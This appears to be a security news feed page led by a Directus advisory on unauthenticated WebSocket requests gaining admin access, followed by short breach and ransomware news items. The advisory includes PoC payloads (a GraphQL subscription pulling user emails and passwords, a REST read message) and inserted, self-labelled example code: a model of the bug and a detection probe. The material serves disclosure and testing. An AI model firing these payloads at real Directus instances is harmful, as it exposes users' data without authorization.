Description: Summary
When WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH is set to "public", an unauthenticated user can perform any of the supported WebSocket operations (CRUD, subscriptions) with full admin privileges.
Details
Accountability for unauthenticated WebSocket requests is set to null. Before the Permissions Policy update, a null accountability meant "public permissions"; since that update it is treated as system/admin level access. Instead of null, the WebSocket handlers need to use createDefaultAccountability() so that unauthenticated users are resolved to public permissions.
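The following is an added example, not Directus source code and not part of the advisory: a constructed model of the null-accountability bug, with the vulnerable handler next to the fixed one. The resolver, the public policy table, the collection names and the stand-in createDefaultAccountability() are all assumptions made for illustration; only the message shape is taken from the PoC.

```javascript
// Added example: a constructed model of the accountability bug in the advisory.
// None of this is Directus source; every name here is an illustrative stand-in.

// Constructed stand-in for Directus' createDefaultAccountability():
// an explicit "public" identity (no user, no role, admin off).
function createDefaultAccountability() {
  return { user: null, role: null, roles: [], admin: false, app: false };
}

// Constructed public policy: anonymous users may only read the user-created
// "articles" collection. System collections such as directus_users are not
// listed, so public gets nothing on them.
const PUBLIC_POLICY = {
  articles: ['read'],
};

const ALL_ACTIONS = ['create', 'read', 'update', 'delete', 'subscribe'];

// Constructed resolver modelling the post-Permissions-Policy behaviour the
// advisory describes: a missing accountability (null/undefined) is treated as
// an internal system call and gets unrestricted access; a real accountability
// object is checked against its admin flag and then the public policy.
function resolvePermissions(accountability, collection) {
  if (accountability == null) {
    return { collection, admin: true, actions: [...ALL_ACTIONS] };
  }
  if (accountability.admin === true) {
    return { collection, admin: true, actions: [...ALL_ACTIONS] };
  }
  return { collection, admin: false, actions: [...(PUBLIC_POLICY[collection] ?? [])] };
}

// Vulnerable handler: an unauthenticated client has no accountability, so null
// is passed straight through and resolves to admin access.
function authorizeVulnerable(message, clientAccountability) {
  const accountability = clientAccountability ?? null;
  return resolvePermissions(accountability, message.collection);
}

// Fixed handler: substitute the explicit public accountability for null, so the
// public policy (not system access) is what unauthenticated requests get.
function authorizeFixed(message, clientAccountability) {
  const accountability = clientAccountability ?? createDefaultAccountability();
  return resolvePermissions(accountability, message.collection);
}

// True if the resolved permissions allow the requested action.
function isAllowed(perms, action) {
  return perms.actions.includes(action);
}

// Constructed messages in the shape the PoC sends over the REST WebSocket.
const readUsers = { type: 'items', action: 'read', collection: 'directus_users' };
const readArticles = { type: 'items', action: 'read', collection: 'articles' };
const deleteArticles = { type: 'items', action: 'delete', collection: 'articles' };

// Runs the same three unauthenticated requests through both handlers.
function demo() {
  return {
    vulnerableReadsUsers: isAllowed(authorizeVulnerable(readUsers, null), 'read'),
    fixedReadsUsers: isAllowed(authorizeFixed(readUsers, null), 'read'),
    fixedReadsArticles: isAllowed(authorizeFixed(readArticles, null), 'read'),
    fixedDeletesArticles: isAllowed(authorizeFixed(deleteArticles, null), 'delete'),
  };
}

console.log(demo());
```

The point of the fixed handler is that "no identity" becomes an explicit public identity before any permission lookup happens, so the resolver never sees the null that it interprets as a system call. An authenticated admin accountability still resolves to full access through the fixed path.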
PoC
1. Start Directus with:
WEBSOCKETS_ENABLED=true
WEBSOCKETS_GRAPHQL_AUTH=public
WEBSOCKETS_REST_AUTH=public
2. Without authenticating, subscribe via GraphQL or REST, or perform any CRUD operation on a user-created collection (system tables are not reachable via CRUD), for example:
  subscription {
    directus_users_mutated {
      key
      event
      data {
        id
        email
        first_name
        last_name
        password
      }
    }
  }
or
  {
    "type": "items",
    "action": "read",
    "collection": "your_collection_name"
  }
3a. Open the Data Studio as any user. Observe that the subscriber is notified on each page navigation (because the user's last_page gets updated; the password field is properly redacted here).
3b. Observe that all available items from the your_collection_name collection are returned.
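As an added check, not part of the advisory or of Directus, the probe below reproduces step 2 of the PoC from a script and reports whether an unauthenticated REST-style read succeeds. It assumes the default REST WebSocket endpoint path (/websocket), that the server echoes the request's uid in its reply, that reads answer with a type "items" message carrying a data array, that denials arrive as a type "error" message with an error.code, and the ping/pong heartbeat; all of those are assumptions about the Directus WebSocket protocol, not facts taken from the page. Point it at a collection that the public role has no read grant on, so any returned rows prove the bug rather than a deliberate public permission.

```javascript
// Added example: a stand-alone probe for the misconfiguration in the PoC.
// Not Directus code. Message shapes and the /websocket path are assumed.
// Usage: DIRECTUS_WS_URL=ws://localhost:8055/websocket DIRECTUS_COLLECTION=articles node probe.js

// The request from the PoC: a REST-style read, deliberately sent with no prior
// auth message. uid lets the reply be matched to this request.
function buildReadRequest(collection, uid = 'probe-1') {
  return { type: 'items', action: 'read', collection, uid };
}

// Classify one server message. Returns null for messages that do not settle
// the question (heartbeat, replies to other uids) so the caller keeps waiting.
function classify(msg, expectedUid = 'probe-1') {
  if (msg.type === 'ping') return null; // heartbeat; the caller answers with pong
  if (msg.uid !== undefined && msg.uid !== expectedUid) return null;
  if (msg.type === 'items' && Array.isArray(msg.data)) {
    return {
      verdict: 'VULNERABLE',
      detail: `unauthenticated read returned ${msg.data.length} item(s)`,
    };
  }
  if (msg.type === 'error') {
    const code = msg.error && msg.error.code;
    const denied = code === 'FORBIDDEN' || code === 'INVALID_CREDENTIALS';
    return {
      verdict: denied ? 'OK' : 'INCONCLUSIVE',
      detail: `server replied with error ${code}`,
    };
  }
  return null;
}

// Connect, send the read, and resolve with the first decisive classification.
// Uses the global WebSocket available in Node 22+ (assumption: no polyfill needed).
function probe(url, collection, timeoutMs = 5000) {
  return new Promise((resolve, reject) => {
    const WS = globalThis.WebSocket;
    if (!WS) return reject(new Error('no global WebSocket; use Node 22+ or a polyfill'));
    const ws = new WS(url);
    const timer = setTimeout(() => {
      ws.close();
      resolve({ verdict: 'INCONCLUSIVE', detail: `no decisive reply within ${timeoutMs} ms` });
    }, timeoutMs);
    ws.onopen = () => ws.send(JSON.stringify(buildReadRequest(collection)));
    ws.onmessage = (ev) => {
      let msg;
      try { msg = JSON.parse(ev.data); } catch { return; }
      if (msg.type === 'ping') { ws.send(JSON.stringify({ type: 'pong' })); return; }
      const result = classify(msg);
      if (result) { clearTimeout(timer); ws.close(); resolve(result); }
    };
    ws.onerror = (err) => { clearTimeout(timer); reject(err); };
  });
}

// Only reach out to the network when a target is configured.
if (process.env.DIRECTUS_WS_URL) {
  probe(process.env.DIRECTUS_WS_URL, process.env.DIRECTUS_COLLECTION || 'your_collection_name')
    .then((r) => console.log(`${r.verdict}: ${r.detail}`))
    .catch((e) => { console.error(e); process.exit(2); });
}
```

A VULNERABLE verdict from a collection with no public read grant means the server resolved the anonymous connection to admin-level access; an OK verdict (FORBIDDEN on the same collection) is what the fixed behaviour, or a server running with the auth mode set to something other than public, produces.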
Impact
This impacts any Directus instance that has either WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH set to public allowing unauthenticat...
December 9th, 2024 (5 months ago)
Description: Radiant Capital now says that North Korean threat actors are behind the $50 million cryptocurrency heist that occurred after hackers breached its systems in an October 16 cyberattack. [...]
December 9th, 2024 (5 months ago)
Description: Researchers demonstrate a proof-of-concept cyberattack vector that gets around remote, on-premises, and local versions of browser isolation security technology to send malicious communications from an attacker-controlled server.
December 9th, 2024 (5 months ago)
Description: Microsoft now blocks the Windows 11 24H2 update on computers with outdated Google Workspace Sync installs because they're causing Outlook launch issues. [...]
December 9th, 2024 (5 months ago)
Description: More than 4% of US attempted e-commerce transactions between Thanksgiving and Cyber Monday suspected to be fraudulent.
December 9th, 2024 (5 months ago)
Description: The threat actors linked to the Black Basta ransomware have been observed switching up their social engineering tactics, distributing a different set of payloads such as Zbot and DarkGate since early October 2024.
"Users within the target environment will be email bombed by the threat actor, which is often achieved by signing up the user's email to numerous mailing lists simultaneously," Rapid7
December 9th, 2024 (5 months ago)
Description: Eight members of an international cybercrime network that stole millions of Euros from victims and set up Airbnb fraud centers were arrested in Belgium and the Netherlands. [...]
December 9th, 2024 (5 months ago)
Description: Electrica Group, a key player in the Romanian electricity distribution and supply market, is investigating a ransomware attack that was still "in progress" earlier today. [...]
December 9th, 2024 (5 months ago)
Description: We can anticipate a growing number of emerging vulnerabilities in the near future, emphasizing the need for an effective prioritization strategy.
December 9th, 2024 (5 months ago)
Description: In 2024, the lesbian dating website ladies.com suffered a data breach. Attributed to an exposed Firebase database, the breach included extensive personal information on 119k users of the service including email addresses, photos, sexual orientation, genders, dates of birth and precise latitude and longitude, among other personal attributes. The website was shut down in mid-2024 and the breach later acknowledged by the site operator in December, along with a breach of the "Senior Dating" website run by the same organisation.
December 9th, 2024 (5 months ago)